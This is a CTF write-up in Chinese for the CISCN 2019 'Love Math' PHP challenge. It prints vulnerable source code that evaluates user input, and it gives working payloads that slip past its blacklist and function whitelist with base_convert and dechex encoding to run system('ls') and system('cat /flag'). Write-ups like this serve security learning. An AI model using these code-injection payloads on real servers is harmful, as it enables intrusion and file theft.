[CISCN 2019 初赛]Love Math

发布时间 2023-10-21 23:08:33作者: 圆弧状态

原理

解题过程

首先进入靶场,有代码让我们审计

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);        //如果没有传递c,则高亮显示代码
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {      //限制c参数的值长度小于80
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];      //黑名单过滤
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp   //这里提示我们要关注数学函数
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);      //这里则是白名单过滤,取出所有函数名并存放到$used_funcs[0]中,算是个二维数组吧
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');    //最后是代码执行
} 

太难了,以下就摘抄wp的,加点自己的理解

简单的代码审计

首先用户输入的参数值长度不能大于等于80。
然后用户输入不能包含黑名单里的字符,比如空格、制表符、回车换行、单双引号、反引号、[]。
接着用户输入的字符串需要匹配白名单。
最后通过eval函数可以执行用户输入。

测试一下白名单规则,经过试验

abs(1),匹配出abs,在白名单中,能过
1abs(),匹配出abs,在白名单中,能过
absa(),匹配出absa,不在白名单中,不能过
abs(a),匹配出abs和a,a不在白名单中,不能过
abs()a,匹配出abs和a,a不在白名单中,不能过
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', content,used_funcs);

表示匹配content变量中以字母或下划线开头,后面任意数量的字母、数组、下划线组成的字符串,将所有的可能结果放在
used_funcs数组中。
其中,
\x7f-\xff 代表一个ASCII码字符,范围是0x7f(10进制 127)到0xff(10进制 255),这在ascii码表里都是不可见字符。
* 匹配前面的子表达式零次或多次。

$pi=hypot.min.fmod;$pi=$pi{2}.$pi{0}.$pi{2}.$pi{6}.$pi{7}.$pi{8}.$pi{3};$pi()

思路:这段payload可以分为三部分,

首先定义一个变量名$pi,因为pi在白名单中且长度最短,其值为hypot.min.fmod,因为hypot、min、fmod均在白名单中,而且phpinfo中的所有字符均可以在其中找到;
然后从hypot.min.fmod中分别取第2、0、2、6、7、8、3位置字符,拼成phpinfo字符串,并重新赋值给$pi变量;
最后执行$pi(),即执行phpinfo()函数。

但是根据这个思路getflag,怎么也会超长度。

然后考虑是不是touch个文件,进行把命令拆分写入文件,再执行文件,但是也难绕过白名单。

最后看了writeup发现在众多函数中有个base_convert()函数,这个才是解题的关键。

先看看函数的用法https://www.runoob.com/php/func-math-base-convert.html

base_convert(number,frombase,tobase); 函数在任意进制之间转换数字。

在看这道题writeup之前,我的认知还停留在16进制会带个abcdef,殊不知还可以到36进制,可以带所有小写字母。

36进制,是数据的一种表示方法。同我们日常生活中的表示法不一样。它由0-9,A-Z组成,字母不区分大小写。与10进制的对应关系是:0-9对应0-9;A-F对应10-35。

进制说明:36进制是 0-Z (0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ)。

有了这个函数就能大大减短payload了。

首先,实现phpinfo()试试

?c=base_convert(55490343972,10,36)()

然后,实现system('ls'),查看当前目录下的文件

?c=base_convert(1751504350,10,36)(base_convert(784,10,36))

发现了flag.php。

接下来,我们就要尝试读取flag.php。

如果直接使用读取文件函数file_get_contents中包含下划线不在我们36进制中,并且base_convert()第一个参数太长会溢出,也就是10进制数没法无限大。

解法一 借助getallheader()来控制请求头,通过请求头的字段读取flag.php

payload中,

base_convert(696468,10,36); 代表把696468从10进制转换为36进制,结果为exec。

base_convert(8768397090111664438,10,30); 代表把8768397090111664438从10进制转换为30进制,结果为getallheaders。注意这里不能用36进制,因为getallheaders的36进制转换为10进制后数太长会溢出,也就是无法把10进制数变回getallheader。所以我们在这里采用30进制。(当然这是在linux下使用php7.3版本的结果,如果是在windows下php7.0前的所有版本对于getallheader进行30-36的进制转换,再转换回来的时候都存在溢出,也就是无法把10进制数变回getallheader)
因为过滤了[],所以这里的getallheaders用{}来调用键

这里前提是要先用ls去找flag
/?c=$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1})

在burp上字段为1:cat flag.php

但是这个payload我也拿不到flag,就当个思路学习一下

解法二

dechex()函数:
可以将十进制转换为十六进制
hex2bin()函数:
可以将十六进制转换为ascii码

事先要先实现ls
?c=$abs=base_convert(37907361743,10,36)(dechex(1598506324));($$abs){1}(($$abs){2})&1=system&2=cat /flag
?c=$abs=base_convert(37907361743,10,36)(dechex(1598506324)); 这里实际就是$abs=_GET
($$abs){1}(($$abs){2})这里实际就是$_GET{'1'}($_GET{'2'}) 也就是system('cat /flag')

https://blog.csdn.net/m0_73512445/article/details/132627161
参考文章:https://www.cnblogs.com/zhengna/p/13964630.html